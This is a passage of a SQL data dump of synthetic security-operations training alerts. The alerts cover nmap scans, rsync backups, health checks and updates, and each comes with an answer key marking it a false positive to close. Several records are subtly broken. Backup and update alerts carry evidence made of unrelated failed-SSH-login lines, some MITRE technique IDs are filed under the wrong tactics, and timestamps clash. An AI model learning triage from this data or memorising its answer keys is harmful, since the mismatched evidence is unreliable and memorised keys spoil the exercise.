Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for routine scanning\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"nmap -A 192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine scanning command executed by IT department\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"This alert was triggered by legitimate IT vulnerability scanning activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1787, 'Authorized Backup Process Detected', 'low', 'Wazuh', 'An authorized backup process was detected on the server, initiated by a recognized administrative account. This aligns with scheduled backup operations.', 'Data Transfer', 'T1030', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.15\",\"username\":\"backup_admin\",\"hostname\":\"backup01\",\"command_line\":\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the server initiating the backup\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server IP\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate backup command executed by admin\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"This alert corresponds to a scheduled backup process, which is normal and expected.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1788, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A series of network scanning activities originating from an internal IP was detected. This is consistent with scheduled vulnerability assessments conducted by the IT department.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"scanner01\",\"command_line\":\"nmap -sS -p 1-65535 192.168.1.10\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network scanning from authorized IT tools.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity matches the profile of routine IT vulnerability scanning and is corroborated by the use of known internal tools.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1789, 'Suspicious System Health Check Activity', 'low', 'Elastic SIEM', 'Detected multiple system health checks from a known internal IP. Checks are part of regular system maintenance operations.', 'Execution', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"sys_maint\",\"hostname\":\"healthcheck_server\",\"command_line\":\"healthcheck_tool --run-full-scan\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in regular system maintenance checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The detected process is a legitimate system health check routinely performed by the IT department.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1790, 'Authorized Administrative Backup Activity', 'low', 'Wazuh', 'An administrative backup process was executed from a known internal server. This is part of scheduled backup operations.', 'Persistence', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.100\",\"username\":\"backup_admin\",\"hostname\":\"backup_server\",\"command_line\":\"backup_tool --full-backup --target 192.168.2.100\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"IP involved in authorized backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"persistence\",\"analysis_notes\":\"The log indicates a scheduled backup process performed by an authorized admin, hence classified as a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1791, 'Legacy Application Misconfiguration Detected', 'medium', 'Azure Sentinel', 'A legacy application attempted to access network resources using outdated protocols. This behavior is consistent with known application misconfiguration.', 'Initial Access', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.75\",\"dst_ip\":\"192.168.3.80\",\"username\":\"legacy_app\",\"hostname\":\"legacy_server\",\"command_line\":\"connect --protocol old_protocol --dst 192.168.3.80\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legacy application accessing internal resources with known outdated protocols.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"initial_access\",\"analysis_notes\":\"This alert is triggered by a known application misconfiguration and does not represent unauthorized access.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1792, 'Authorized System Update Process Executed', 'low', 'Splunk', 'Detected execution of a system update process from an internal IP. This is part of scheduled update operations.', 'Execution', 'T1074', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.5\",\"dst_ip\":\"192.168.4.6\",\"username\":\"update_admin\",\"hostname\":\"update_server\",\"command_line\":\"update_tool --apply-updates\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"IP involved in authorized system updates.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The activity is authorized and part of routine system update processes; hence, it is a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool 